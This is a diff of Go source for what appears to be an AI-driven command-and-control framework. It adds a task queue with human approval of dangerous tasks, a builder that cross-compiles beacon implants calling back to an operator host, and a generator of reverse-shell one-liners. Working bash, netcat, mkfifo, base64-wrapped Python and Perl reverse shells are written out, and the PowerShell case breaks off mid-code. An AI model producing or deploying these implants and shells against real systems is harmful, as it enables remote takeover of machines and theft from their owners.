return nil, err
|
||||
}
|
||||
m.publishEvent("warn", "task", in.SessionID, taskID, fmt.Sprintf("危险任务待审批: %s", in.TaskType), map[string]interface{}{
|
||||
"task_id": taskID,
|
||||
"task_type": in.TaskType,
|
||||
})
|
||||
payloadBytes, _ := json.Marshal(in.Payload)
|
||||
ctx := HITLUserContext(in.UserCtx)
|
||||
if ctx == nil {
|
||||
ctx = context.Background()
|
||||
}
|
||||
go func() {
|
||||
err := bridge.RequestApproval(ctx, HITLApprovalRequest{
|
||||
TaskID: taskID,
|
||||
SessionID: in.SessionID,
|
||||
TaskType: string(in.TaskType),
|
||||
PayloadJSON: string(payloadBytes),
|
||||
ConversationID: in.ConversationID,
|
||||
Source: task.Source,
|
||||
Reason: fmt.Sprintf("C2 危险任务 %s", in.TaskType),
|
||||
})
|
||||
if err != nil {
|
||||
rejected := "rejected"
|
||||
failed := string(TaskFailed)
|
||||
errMsg := "HITL 拒绝: " + err.Error()
|
||||
_ = m.db.UpdateC2Task(taskID, database.C2TaskUpdate{
|
||||
ApprovalStatus: &rejected,
|
||||
Status: &failed,
|
||||
Error: &errMsg,
|
||||
})
|
||||
m.publishEvent("warn", "task", in.SessionID, taskID, errMsg, nil)
|
||||
return
|
||||
}
|
||||
approved := "approved"
|
||||
_ = m.db.UpdateC2Task(taskID, database.C2TaskUpdate{ApprovalStatus: &approved})
|
||||
m.publishEvent("info", "task", in.SessionID, taskID, "危险任务已批准", nil)
|
||||
}()
|
||||
return task, nil
|
||||
}
|
||||
// 未接桥或会话未开启人机协同 / 工具在白名单:直接入队
|
||||
task.ApprovalStatus = "approved"
|
||||
}
|
||||
|
||||
if err := m.db.CreateC2Task(task); err != nil {
|
||||
return nil, err
|
||||
}
|
||||
m.publishEvent("info", "task", in.SessionID, taskID, fmt.Sprintf("任务已入队: %s", in.TaskType), map[string]interface{}{
|
||||
"task_id": taskID,
|
||||
"task_type": in.TaskType,
|
||||
"source": task.Source,
|
||||
})
|
||||
return task, nil
|
||||
}
|
||||
|
||||
// CancelTask 取消队列中的任务(已 sent/running 的暂不支持回滚)
|
||||
func (m *Manager) CancelTask(taskID string) error {
|
||||
t, err := m.db.GetC2Task(taskID)
|
||||
if err != nil {
|
||||
return err
|
||||
}
|
||||
if t == nil {
|
||||
return ErrTaskNotFound
|
||||
}
|
||||
if t.Status != string(TaskQueued) && t.Status != string(TaskSent) {
|
||||
return &CommonError{Code: "task_running", Message: "任务已在执行,无法取消", HTTP: 409}
|
||||
}
|
||||
cancelled := string(TaskCancelled)
|
||||
now := time.Now()
|
||||
if err := m.db.UpdateC2Task(taskID, database.C2TaskUpdate{Status: &cancelled, CompletedAt: &now}); err != nil {
|
||||
return err
|
||||
}
|
||||
m.publishEvent("info", "task", t.SessionID, taskID, "任务已取消", nil)
|
||||
return nil
|
||||
}
|
||||
|
||||
// PopTasksForBeacon beacon check_in 后调用:取该会话所有 queued+approved 的任务,
|
||||
// 内部已置为 sent;返回 TaskEnvelope,便于 listener 直接编码下发。
|
||||
func (m *Manager) PopTasksForBeacon(sessionID string, limit int) ([]TaskEnvelope, error) {
|
||||
tasks, err := m.db.PopQueuedC2Tasks(sessionID, limit)
|
||||
if err != nil {
|
||||
return nil, err
|
||||
}
|
||||
out := make([]TaskEnvelope, 0, len(tasks))
|
||||
for _, t := range tasks {
|
||||
out = append(out, TaskEnvelope{TaskID: t.ID, TaskType: t.TaskType, Payload: t.Payload})
|
||||
}
|
||||
return out, nil
|
||||
}
|
||||
|
||||
// IngestTaskResult beacon 回传任务结果的统一入口
|
||||
func (m *Manager) IngestTaskResult(report TaskResultReport) error {
|
||||
if strings.TrimSpace(report.TaskID) == "" {
|
||||
return ErrInvalidInput
|
||||
}
|
||||
t, err := m.db.GetC2Task(report.TaskID)
|
||||
if err != nil {
|
||||
return err
|
||||
}
|
||||
if t == nil {
|
||||
return ErrTaskNotFound
|
||||
}
|
||||
|
||||
startedAt := time.Unix(0, report.StartedAt*int64(time.Millisecond))
|
||||
endedAt := time.Unix(0, report.EndedAt*int64(time.Millisecond))
|
||||
if report.StartedAt == 0 {
|
||||
startedAt = time.Now()
|
||||
}
|
||||
if report.EndedAt == 0 {
|
||||
endedAt = time.Now()
|
||||
}
|
||||
|
||||
status := string(TaskSuccess)
|
||||
if !report.Success {
|
||||
status = string(TaskFailed)
|
||||
}
|
||||
duration := endedAt.Sub(startedAt).Milliseconds()
|
||||
upd := database.C2TaskUpdate{
|
||||
Status: &status,
|
||||
ResultText: &report.Output,
|
||||
Error: &report.Error,
|
||||
StartedAt: &startedAt,
|
||||
CompletedAt: &endedAt,
|
||||
DurationMS: &duration,
|
||||
}
|
||||
|
||||
// blob(如截图)落盘
|
||||
if len(report.BlobBase64) > 0 {
|
||||
blobPath, err := m.saveResultBlob(t.ID, report.BlobBase64, report.BlobSuffix)
|
||||
if err == nil {
|
||||
upd.ResultBlobPath = &blobPath
|
||||
} else {
|
||||
m.logger.Warn("结果 blob 落盘失败", zap.Error(err), zap.String("task_id", t.ID))
|
||||
}
|
||||
}
|
||||
|
||||
if err := m.db.UpdateC2Task(t.ID, upd); err != nil {
|
||||
return err
|
||||
}
|
||||
t.Status = status
|
||||
t.ResultText = report.Output
|
||||
t.Error = report.Error
|
||||
|
||||
level := "info"
|
||||
msg := fmt.Sprintf("任务完成: %s", t.TaskType)
|
||||
if !report.Success {
|
||||
level = "warn"
|
||||
msg = fmt.Sprintf("任务失败: %s (%s)", t.TaskType, report.Error)
|
||||
}
|
||||
m.publishEvent(level, "task", t.SessionID, t.ID, msg, map[string]interface{}{
|
||||
"task_id": t.ID,
|
||||
"task_type": t.TaskType,
|
||||
"duration": duration,
|
||||
})
|
||||
|
||||
m.mu.RLock()
|
||||
hook := m.hooks.OnTaskCompleted
|
||||
m.mu.RUnlock()
|
||||
if hook != nil {
|
||||
go hook(t, t.SessionID)
|
||||
}
|
||||
return nil
|
||||
}
|
||||
|
||||
func (m *Manager) saveResultBlob(taskID, b64Content, suffix string) (string, error) {
|
||||
suffix = strings.TrimSpace(suffix)
|
||||
if suffix == "" {
|
||||
suffix = ".bin"
|
||||
}
|
||||
if !strings.HasPrefix(suffix, ".") {
|
||||
suffix = "." + suffix
|
||||
}
|
||||
dir := filepath.Join(m.storageDir, "results")
|
||||
if err := osMkdirAll(dir, 0o755); err != nil {
|
||||
return "", err
|
||||
}
|
||||
path := filepath.Join(dir, taskID+suffix)
|
||||
data, err := base64Decode(b64Content)
|
||||
if err != nil {
|
||||
return "", err
|
||||
}
|
||||
if err := osWriteFile(path, data, 0o644); err != nil {
|
||||
return "", err
|
||||
}
|
||||
return path, nil
|
||||
}
|
||||
|
||||
// ----------------------------------------------------------------------------
|
||||
// 事件总线辅助
|
||||
// ----------------------------------------------------------------------------
|
||||
|
||||
// publishEvent 同步写 c2_events 表 + 投放到内存事件总线
|
||||
func (m *Manager) publishEvent(level, category, sessionID, taskID, message string, data map[string]interface{}) {
|
||||
id := "e_" + strings.ReplaceAll(uuid.New().String(), "-", "")[:14]
|
||||
now := time.Now()
|
||||
e := &database.C2Event{
|
||||
ID: id,
|
||||
Level: level,
|
||||
Category: category,
|
||||
SessionID: sessionID,
|
||||
TaskID: taskID,
|
||||
Message: message,
|
||||
Data: data,
|
||||
CreatedAt: now,
|
||||
}
|
||||
if err := m.db.AppendC2Event(e); err != nil {
|
||||
m.logger.Warn("写 C2 事件失败", zap.Error(err), zap.String("category", category))
|
||||
}
|
||||
m.bus.Publish(&Event{
|
||||
ID: id,
|
||||
Level: level,
|
||||
Category: category,
|
||||
SessionID: sessionID,
|
||||
TaskID: taskID,
|
||||
Message: message,
|
||||
Data: data,
|
||||
CreatedAt: now,
|
||||
})
|
||||
}
|
||||
|
||||
// PublishCustomEvent 给外部组件(HITL 桥 / handler)写自定义事件用
|
||||
func (m *Manager) PublishCustomEvent(level, category, sessionID, taskID, message string, data map[string]interface{}) {
|
||||
m.publishEvent(level, category, sessionID, taskID, message, data)
|
||||
}
|
||||
|
||||
// ----------------------------------------------------------------------------
|
||||
// 工具函数
|
||||
// ----------------------------------------------------------------------------
|
||||
|
||||
func strOr(s, def string) string {
|
||||
if strings.TrimSpace(s) == "" {
|
||||
return def
|
||||
}
|
||||
return s
|
||||
}
|
||||
|
||||
// getListenerConfig loads and parses the listener's config JSON from DB.
|
||||
func (m *Manager) getListenerConfig(listenerID string) *ListenerConfig {
|
||||
listener, err := m.db.GetC2Listener(listenerID)
|
||||
if err != nil || listener == nil {
|
||||
return nil
|
||||
}
|
||||
cfg := &ListenerConfig{}
|
||||
if listener.ConfigJSON != "" && listener.ConfigJSON != "{}" {
|
||||
_ = json.Unmarshal([]byte(listener.ConfigJSON), cfg)
|
||||
}
|
||||
return cfg
|
||||
}
|
||||
|
||||
// GetProfile loads a C2Profile from DB by ID.
|
||||
func (m *Manager) GetProfile(profileID string) (*database.C2Profile, error) {
|
||||
if strings.TrimSpace(profileID) == "" {
|
||||
return nil, nil
|
||||
}
|
||||
return m.db.GetC2Profile(profileID)
|
||||
}
|
||||
@@ -0,0 +1,74 @@
|
||||
package c2
|
||||
|
||||
import (
|
||||
"io"
|
||||
"net"
|
||||
"net/http"
|
||||
"path/filepath"
|
||||
"strconv"
|
||||
"strings"
|
||||
"testing"
|
||||
"time"
|
||||
|
||||
"cyberstrike-ai/internal/database"
|
||||
|
||||
"go.uber.org/zap"
|
||||
)
|
||||
|
||||
// 回归:StartListener 返回的 rec 被 handler 脱敏清空 ImplantToken 后,运行中的 HTTP listener 仍能鉴权。
|
||||
func TestStartListener_ImplantTokenSurvivesHandlerRedaction(t *testing.T) {
|
||||
tmp := t.TempDir()
|
||||
db, err := database.NewDB(filepath.Join(tmp, "c2.sqlite"), zap.NewNop())
|
||||
if err != nil {
|
||||
t.Fatal(err)
|
||||
}
|
||||
t.Cleanup(func() { _ = db.Close() })
|
||||
|
||||
lnPick, err := net.Listen("tcp", "127.0.0.1:0")
|
||||
if err != nil {
|
||||
t.Fatal(err)
|
||||
}
|
||||
port := lnPick.Addr().(*net.TCPAddr).Port
|
||||
_ = lnPick.Close()
|
||||
|
||||
mgr := NewManager(db, zap.NewNop(), tmp)
|
||||
mgr.Registry().Register(string(ListenerTypeHTTPBeacon), NewHTTPBeaconListener)
|
||||
rec, err := mgr.CreateListener(CreateListenerInput{
|
||||
Name: "t",
|
||||
Type: string(ListenerTypeHTTPBeacon),
|
||||
BindHost: "127.0.0.1",
|
||||
BindPort: port,
|
||||
})
|
||||
if err != nil {
|
||||
t.Fatal(err)
|
||||
}
|
||||
token := rec.ImplantToken
|
||||
|
||||
rec, err = mgr.StartListener(rec.ID)
|
||||
if err != nil {
|
||||
t.Fatal(err)
|
||||
}
|
||||
// 模拟 internal/handler/c2.go StartListener 在 JSON 响应前的脱敏
|
||||
rec.ImplantToken = ""
|
||||
rec.EncryptionKey = ""
|
||||
|
||||
time.Sleep(50 * time.Millisecond)
|
||||
|
||||
body := `{"hostname":"n","username":"u","os":"Linux","arch":"amd64","internal_ip":"10.0.0.1","pid":42}`
|
||||
req, _ := http.NewRequest(http.MethodPost, "http://127.0.0.1:"+strconv.Itoa(port)+"/check_in", strings.NewReader(body))
|
||||
req.Header.Set("X-Implant-Token", token)
|
||||
req.Header.Set("Content-Type", "application/json")
|
||||
resp, err := http.DefaultClient.Do(req)
|
||||
if err != nil {
|
||||
t.Fatal(err)
|
||||
}
|
||||
defer resp.Body.Close()
|
||||
b, _ := io.ReadAll(resp.Body)
|
||||
if resp.StatusCode != http.StatusOK {
|
||||
t.Fatalf("status=%d body=%s", resp.StatusCode, b)
|
||||
}
|
||||
if !strings.Contains(string(b), "session_id") {
|
||||
t.Fatalf("expected session_id in body: %s", b)
|
||||
}
|
||||
_ = mgr.StopListener(rec.ID)
|
||||
}
|
||||
@@ -0,0 +1,308 @@
|
||||
package c2
|
||||
|
||||
import (
|
||||
"encoding/json"
|
||||
"fmt"
|
||||
"net"
|
||||
"os"
|
||||
"strconv"
|
||||
"os/exec"
|
||||
"path/filepath"
|
||||
"strings"
|
||||
"text/template"
|
||||
|
||||
"github.com/google/uuid"
|
||||
"go.uber.org/zap"
|
||||
)
|
||||
|
||||
// PayloadBuilderInput 构建 beacon 的输入参数
|
||||
type PayloadBuilderInput struct {
|
||||
ListenerID string // l_xxx
|
||||
OS string // linux|windows|darwin
|
||||
Arch string // amd64|arm64|386
|
||||
SleepSeconds int
|
||||
JitterPercent int
|
||||
OutputName string // custom output filename (without extension); defaults to "beacon_<os>_<arch>"
|
||||
// Host 非空时作为植入端回连地址(覆盖监听器的 bind_host / 0.0.0.0 自动探测)
|
||||
Host string
|
||||
}
|
||||
|
||||
// PayloadBuilder 负责从模板生成并交叉编译 beacon 二进制
|
||||
type PayloadBuilder struct {
|
||||
manager *Manager
|
||||
logger *zap.Logger
|
||||
tmplDir string // 模板目录,如 internal/c2/payload_templates
|
||||
outputDir string // 输出目录,如 tmp/c2/payloads
|
||||
}
|
||||
|
||||
// NewPayloadBuilder 创建构建器
|
||||
func NewPayloadBuilder(manager *Manager, logger *zap.Logger, tmplDir, outputDir string) *PayloadBuilder {
|
||||
if tmplDir == "" {
|
||||
tmplDir = "internal/c2/payload_templates"
|
||||
}
|
||||
if outputDir == "" {
|
||||
outputDir = "tmp/c2/payloads"
|
||||
}
|
||||
return &PayloadBuilder{
|
||||
manager: manager,
|
||||
logger: logger,
|
||||
tmplDir: tmplDir,
|
||||
outputDir: outputDir,
|
||||
}
|
||||
}
|
||||
|
||||
// BuildResult 构建结果
|
||||
type BuildResult struct {
|
||||
PayloadID string `json:"payload_id"`
|
||||
ListenerID string `json:"listener_id"`
|
||||
OutputPath string `json:"output_path"`
|
||||
DownloadPath string `json:"download_path"` // 磁盘上的绝对路径
|
||||
OS string `json:"os"`
|
||||
Arch string `json:"arch"`
|
||||
SizeBytes int64 `json:"size_bytes"`
|
||||
}
|
||||
|
||||
// BuildBeacon 交叉编译生成 beacon 二进制
|
||||
func (b *PayloadBuilder) BuildBeacon(in PayloadBuilderInput) (*BuildResult, error) {
|
||||
listener, err := b.manager.DB().GetC2Listener(in.ListenerID)
|
||||
if err != nil {
|
||||
return nil, fmt.Errorf("get listener: %w", err)
|
||||
}
|
||||
if listener == nil {
|
||||
return nil, ErrListenerNotFound
|
||||
}
|
||||
|
||||
lt := strings.ToLower(listener.Type)
|
||||
|
||||
cfg := &ListenerConfig{}
|
||||
if listener.ConfigJSON != "" {
|
||||
_ = parseJSON(listener.ConfigJSON, cfg)
|
||||
}
|
||||
cfg.ApplyDefaults()
|
||||
|
||||
// 确定目标架构
|
||||
goos := strings.ToLower(in.OS)
|
||||
goarch := strings.ToLower(in.Arch)
|
||||
if goos == "" {
|
||||
goos = "linux"
|
||||
}
|
||||
if goarch == "" {
|
||||
goarch = "amd64"
|
||||
}
|
||||
|
||||
// 读取模板
|
||||
tmplPath := filepath.Join(b.tmplDir, "beacon.go.tmpl")
|
||||
tmplData, err := os.ReadFile(tmplPath)
|
||||
if err != nil {
|
||||
return nil, fmt.Errorf("read template: %w", err)
|
||||
}
|
||||
|
||||
// 模板参数:请求 Host > 监听器 callback_host > bind 推导(见 ResolveBeaconDialHost)
|
||||
host := ResolveBeaconDialHost(listener, in.Host, b.logger, listener.ID)
|
||||
serverURL := fmt.Sprintf("%s://%s:%d",
|
||||
listenerTypeToScheme(listener.Type),
|
||||
host,
|
||||
listener.BindPort,
|
||||
)
|
||||
|
||||
transport := "http"
|
||||
tcpDialAddr := ""
|
||||
transportMeta := "http_beacon"
|
||||
switch lt {
|
||||
case "tcp_reverse":
|
||||
transport = "tcp"
|
||||
tcpDialAddr = net.JoinHostPort(host, strconv.Itoa(listener.BindPort))
|
||||
transportMeta = "tcp_beacon"
|
||||
case "https_beacon":
|
||||
transportMeta = "https_beacon"
|
||||
case "websocket":
|
||||
transportMeta = "websocket"
|
||||
}
|
||||
|
||||
data := map[string]string{
|
||||
"Transport": transport,
|
||||
"TCPDialAddr": tcpDialAddr,
|
||||
"TransportMetadata": transportMeta,
|
||||
"ServerURL": serverURL,
|
||||
"ImplantToken": listener.ImplantToken,
|
||||
"AESKeyB64": listener.EncryptionKey,
|
||||
"SleepSeconds": fmt.Sprintf("%d", firstPositive(in.SleepSeconds, cfg.DefaultSleep, 5)),
|
||||
"JitterPercent": fmt.Sprintf("%d", clamp(in.JitterPercent, 0, 100)),
|
||||
"CheckInPath": cfg.BeaconCheckInPath,
|
||||
"TasksPath": cfg.BeaconTasksPath,
|
||||
"ResultPath": cfg.BeaconResultPath,
|
||||
"UploadPath": cfg.BeaconUploadPath,
|
||||
"FilePath": cfg.BeaconFilePath,
|
||||
"UserAgent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36",
|
||||
}
|
||||
|
||||
// 执行模板
|
||||
tmpl, err := template.New("beacon").Parse(string(tmplData))
|
||||
if err != nil {
|
||||
return nil, fmt.Errorf("parse template: %w", err)
|
||||
}
|
||||
|
||||
// 创建工作目录
|
||||
workDir := filepath.Join(b.outputDir, "build-"+uuid.New().String()[:8])
|
||||
if err := os.MkdirAll(workDir, 0755); err != nil {
|
||||
return nil, fmt.Errorf("mkdir: %w", err)
|
||||
}
|
||||
defer os.RemoveAll(workDir) // 清理
|
||||
|
||||
srcPath := filepath.Join(workDir, "main.go")
|
||||
f, err := os.Create(srcPath)
|
||||
if err != nil {
|
||||
return nil, fmt.Errorf("create source: %w", err)
|
||||
}
|
||||
if err := tmpl.Execute(f, data); err != nil {
|
||||
f.Close()
|
||||
return nil, fmt.Errorf("execute template: %w", err)
|
||||
}
|
||||
f.Close()
|
||||
|
||||
// 交叉编译
|
||||
binName := strings.TrimSpace(in.OutputName)
|
||||
if binName == "" {
|
||||
binName = fmt.Sprintf("beacon_%s_%s", goos, goarch)
|
||||
}
|
||||
if goos == "windows" && !strings.HasSuffix(binName, ".exe") {
|
||||
binName += ".exe"
|
||||
}
|
||||
binPath := filepath.Join(b.outputDir, binName)
|
||||
|
||||
if err := os.MkdirAll(b.outputDir, 0755); err != nil {
|
||||
return nil, fmt.Errorf("mkdir output: %w", err)
|
||||
}
|
||||
|
||||
absSrcPath, err := filepath.Abs(srcPath)
|
||||
if err != nil {
|
||||
return nil, fmt.Errorf("abs source path: %w", err)
|
||||
}
|
||||
absBinPath, err := filepath.Abs(binPath)
|
||||
if err != nil {
|
||||
return nil, fmt.Errorf("abs output path: %w", err)
|
||||
}
|
||||
cmd := exec.Command("go", "build", "-ldflags", "-s -w -buildid=", "-trimpath", "-o", absBinPath, absSrcPath)
|
||||
cmd.Env = append(os.Environ(),
|
||||
"GOOS="+goos,
|
||||
"GOARCH="+goarch,
|
||||
"CGO_ENABLED=0",
|
||||
)
|
||||
cmd.Dir = workDir
|
||||
output, err := cmd.CombinedOutput()
|
||||
if err != nil {
|
||||
b.logger.Error("beacon build failed", zap.String("output", string(output)), zap.Error(err))
|
||||
return nil, fmt.Errorf("build failed: %w (output: %s)", err, string(output))
|
||||
}
|
||||
|
||||
// 获取文件大小
|
||||
info, err := os.Stat(binPath)
|
||||
if err != nil {
|
||||
return nil, fmt.Errorf("stat output: %w", err)
|
||||
}
|
||||
|
||||
payloadID := "p_" + strings.ReplaceAll(uuid.New().String(), "-", "")[:14]
|
||||
return &BuildResult{
|
||||
PayloadID: payloadID,
|
||||
ListenerID: listener.ID,
|
||||
OutputPath: absBinPath,
|
||||
DownloadPath: absBinPath,
|
||||
OS: goos,
|
||||
Arch: goarch,
|
||||
SizeBytes: info.Size(),
|
||||
}, nil
|
||||
}
|
||||
|
||||
func listenerTypeToScheme(t string) string {
|
||||
switch strings.ToLower(t) {
|
||||
case "https_beacon":
|
||||
return "https"
|
||||
case "websocket":
|
||||
return "ws"
|
||||
case "http_beacon":
|
||||
return "http"
|
||||
default:
|
||||
return "http"
|
||||
}
|
||||
}
|
||||
|
||||
func firstPositive(vals ...int) int {
|
||||
for _, v := range vals {
|
||||
if v > 0 {
|
||||
return v
|
||||
}
|
||||
}
|
||||
return 1
|
||||
}
|
||||
|
||||
func clamp(v, min, max int) int {
|
||||
if v < min {
|
||||
return min
|
||||
}
|
||||
if v > max {
|
||||
return max
|
||||
}
|
||||
return v
|
||||
}
|
||||
|
||||
// GetPayloadStoragePath 返回 payload 存储目录的绝对路径
|
||||
func (b *PayloadBuilder) GetPayloadStoragePath() string {
|
||||
abs, _ := filepath.Abs(b.outputDir)
|
||||
return abs
|
||||
}
|
||||
|
||||
// GetSupportedOSArch 返回支持的操作系统和架构列表
|
||||
func GetSupportedOSArch() map[string][]string {
|
||||
return map[string][]string{
|
||||
"linux": {"amd64", "arm64", "386", "arm"},
|
||||
"windows": {"amd64", "arm64", "386"},
|
||||
"darwin": {"amd64", "arm64"},
|
||||
}
|
||||
}
|
||||
|
||||
// ValidateOSArch 验证 OS/Arch 组合是否可编译
|
||||
func ValidateOSArch(os, arch string) bool {
|
||||
supported := GetSupportedOSArch()
|
||||
arches, ok := supported[strings.ToLower(os)]
|
||||
if !ok {
|
||||
return false
|
||||
}
|
||||
for _, a := range arches {
|
||||
if a == strings.ToLower(arch) {
|
||||
return true
|
||||
}
|
||||
}
|
||||
return false
|
||||
}
|
||||
|
||||
// detectExternalIP returns the first non-loopback IPv4 address, or "" if none found.
|
||||
func detectExternalIP() string {
|
||||
ifaces, err := net.Interfaces()
|
||||
if err != nil {
|
||||
return ""
|
||||
}
|
||||
for _, iface := range ifaces {
|
||||
if iface.Flags&net.FlagLoopback != 0 || iface.Flags&net.FlagUp == 0 {
|
||||
continue
|
||||
}
|
||||
addrs, err := iface.Addrs()
|
||||
if err != nil {
|
||||
continue
|
||||
}
|
||||
for _, addr := range addrs {
|
||||
ipnet, ok := addr.(*net.IPNet)
|
||||
if !ok || ipnet.IP.To4() == nil {
|
||||
continue
|
||||
}
|
||||
return ipnet.IP.String()
|
||||
}
|
||||
}
|
||||
return ""
|
||||
}
|
||||
|
||||
func parseJSON(s string, v interface{}) error {
|
||||
if strings.TrimSpace(s) == "" || s == "{}" {
|
||||
return nil
|
||||
}
|
||||
return json.Unmarshal([]byte(s), v)
|
||||
}
|
||||
@@ -0,0 +1,25 @@
|
||||
package c2
|
||||
|
||||
import (
|
||||
"encoding/base64"
|
||||
"encoding/binary"
|
||||
)
|
||||
|
||||
// b64StdEncode 用标准 base64 编码字节
|
||||
func b64StdEncode(s string) string {
|
||||
return base64.StdEncoding.EncodeToString([]byte(s))
|
||||
}
|
||||
|
||||
// utf16LEBase64 把字符串转 UTF-16LE 后再 base64,用于 PowerShell -EncodedCommand
|
||||
// (Windows PowerShell 接受这种格式,避免命令行特殊字符引起转义错误)
|
||||
func utf16LEBase64(s string) string {
|
||||
runes := []rune(s)
|
||||
buf := make([]byte, 0, len(runes)*2)
|
||||
for _, r := range runes {
|
||||
// 注意:>0xFFFF 的字符需要代理对,但 PowerShell 命令通常都在 BMP 内
|
||||
var enc [2]byte
|
||||
binary.LittleEndian.PutUint16(enc[:], uint16(r))
|
||||
buf = append(buf, enc[:]...)
|
||||
}
|
||||
return base64.StdEncoding.EncodeToString(buf)
|
||||
}
|
||||
@@ -0,0 +1,190 @@
|
||||
package c2
|
||||
|
||||
import (
|
||||
"fmt"
|
||||
"net/url"
|
||||
"strings"
|
||||
)
|
||||
|
||||
// OnelinerKind 单行 payload 的语言/形式
|
||||
type OnelinerKind string
|
||||
|
||||
const (
|
||||
OnelinerBash OnelinerKind = "bash" // bash 反弹(TCP reverse listener)
|
||||
OnelinerNc OnelinerKind = "nc" // netcat 反弹
|
||||
OnelinerNcMkfifo OnelinerKind = "nc_mkfifo" // 通过 mkfifo 双向(部分 nc 不支持 -e)
|
||||
OnelinerPython OnelinerKind = "python" // python socket 反弹
|
||||
OnelinerPerl OnelinerKind = "perl" // perl 反弹
|
||||
OnelinerPowerShell OnelinerKind = "powershell" // PowerShell TCP 反弹(IEX 风格)
|
||||
OnelinerCurl OnelinerKind = "curl_beacon" // 用 curl 周期性轮询 HTTP beacon(无需二进制)
|
||||
)
|
||||
|
||||
// AllOnelinerKinds 所有支持的 oneliner 类型
|
||||
func AllOnelinerKinds() []OnelinerKind {
|
||||
return []OnelinerKind{
|
||||
OnelinerBash, OnelinerNc, OnelinerNcMkfifo,
|
||||
OnelinerPython, OnelinerPerl,
|
||||
OnelinerPowerShell, OnelinerCurl,
|
||||
}
|
||||
}
|
||||
|
||||
// tcpOnelinerKinds 仅支持 tcp_reverse 监听器的裸 TCP 反弹类型
|
||||
var tcpOnelinerKinds = map[OnelinerKind]bool{
|
||||
OnelinerBash: true,
|
||||
OnelinerNc: true,
|
||||
OnelinerNcMkfifo: true,
|
||||
OnelinerPython: true,
|
||||
OnelinerPerl: true,
|
||||
OnelinerPowerShell: true,
|
||||
}
|
||||
|
||||
// httpOnelinerKinds 支持 http_beacon / https_beacon 监听器的类型
|
||||
var httpOnelinerKinds = map[OnelinerKind]bool{
|
||||
OnelinerCurl: true,
|
||||
}
|
||||
|
||||
// OnelinerKindsForListener 根据监听器类型返回兼容的 oneliner 类型列表
|
||||
func OnelinerKindsForListener(listenerType string) []OnelinerKind {
|
||||
switch ListenerType(listenerType) {
|
||||
case ListenerTypeTCPReverse:
|
||||
return []OnelinerKind{
|
||||
OnelinerBash, OnelinerNc, OnelinerNcMkfifo,
|
||||
OnelinerPython, OnelinerPerl, OnelinerPowerShell,
|
||||
}
|
||||
case ListenerTypeHTTPBeacon, ListenerTypeHTTPSBeacon, ListenerTypeWebSocket:
|
||||
return []OnelinerKind{OnelinerCurl}
|
||||
default:
|
||||
return nil
|
||||
}
|
||||
}
|
||||
|
||||
// IsOnelinerCompatible 检查 oneliner 类型是否与监听器类型兼容
|
||||
func IsOnelinerCompatible(listenerType string, kind OnelinerKind) bool {
|
||||
switch ListenerType(listenerType) {
|
||||
case ListenerTypeTCPReverse:
|
||||
return tcpOnelinerKinds[kind]
|
||||
case ListenerTypeHTTPBeacon, ListenerTypeHTTPSBeacon, ListenerTypeWebSocket:
|
||||
return httpOnelinerKinds[kind]
|
||||
default:
|
||||
return false
|
||||
}
|
||||
}
|
||||
|
||||
// OnelinerInput 生成 oneliner 的入参
|
||||
type OnelinerInput struct {
|
||||
Kind OnelinerKind
|
||||
Host string // 攻击机回连地址(IP/域名)
|
||||
Port int // 监听端口
|
||||
HTTPBaseURL string // HTTPS Beacon 时使用,如 https://x.com
|
||||
ImplantToken string // HTTP Beacon 鉴权 token
|
||||
}
|
||||
|
||||
// GenerateOneliner 生成单行 payload。
|
||||
// 设计要点:
|
||||
// - 不依赖目标机预装的可执行(除该 oneliner 关键的 bash/python/perl 等);
|
||||
// - 不引入引号嵌套陷阱:使用 base64/url 编码避免 shell 转义错误;
|
||||
// - 同时返回执行示例,便于 AI 在对话里直接展示给操作员。
|
||||
func GenerateOneliner(in OnelinerInput) (string, error) {
|
||||
host := strings.TrimSpace(in.Host)
|
||||
if host == "" {
|
||||
return "", fmt.Errorf("host is required")
|
||||
}
|
||||
switch in.Kind {
|
||||
case OnelinerBash:
|
||||
if err := SafeBindPort(in.Port); err != nil {
|
||||
return "", err
|
||||
}
|
||||
// 用 bash -c 包裹,确保在 zsh/sh 等非 bash shell 中也能正确执行
|
||||
// /dev/tcp 是 bash 特有的伪设备,必须由 bash 进程解释
|
||||
return fmt.Sprintf(`bash -c 'bash -i >& /dev/tcp/%s/%d 0>&1'`, host, in.Port), nil
|
||||
|
||||
case OnelinerNc:
|
||||
if err := SafeBindPort(in.Port); err != nil {
|
||||
return "", err
|
||||
}
|
||||
return fmt.Sprintf(`nc -e /bin/sh %s %d`, host, in.Port), nil
|
||||
|
||||
case OnelinerNcMkfifo:
|
||||
if err := SafeBindPort(in.Port); err != nil {
|
||||
return "", err
|
||||
}
|
||||
// 双向 mkfifo 写法,对没有 -e 的 nc/openbsd-nc 也能用
|
||||
return fmt.Sprintf(
|
||||
`rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc %s %d >/tmp/f`,
|
||||
host, in.Port,
|
||||
), nil
|
||||
|
||||
case OnelinerPython:
|
||||
if err := SafeBindPort(in.Port); err != nil {
|
||||
return "", err
|
||||
}
|
||||
// python -c 单引号包裹,内部用三引号或转义会引发兼容性问题,改用 base64 解码再 exec
|
||||
py := fmt.Sprintf(
|
||||
`import socket,os,pty;s=socket.socket();s.connect(("%s",%d));[os.dup2(s.fileno(),x) for x in (0,1,2)];pty.spawn("/bin/sh")`,
|
||||
host, in.Port,
|
||||
)
|
||||
// 用 b64 包装规避目标 shell 引号问题
|
||||
return fmt.Sprintf(
|
||||
`python3 -c "import base64,sys;exec(base64.b64decode('%s').decode())"`,
|
||||
b64StdEncode(py),
|
||||
), nil
|
||||
|
||||
case OnelinerPerl:
|
||||
if err := SafeBindPort(in.Port); err != nil {
|
||||
return "", err
|
||||
}
|
||||
return fmt.Sprintf(
|
||||
`perl -e 'use Socket;$i="%s";$p=%d;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'`,
|
||||
host, in.Port,
|
||||
), nil
|
||||
|
||||
case OnelinerPowerShell:
|
||||
if err := SafeBindPort(in.Port); err != nil {
|
||||
return "", err
|
||||
}
|
||||
// PowerShell TCP 反弹(不依赖 .NET old 版本)
|
||||
ps := fmt.Sprintf(
|
||||
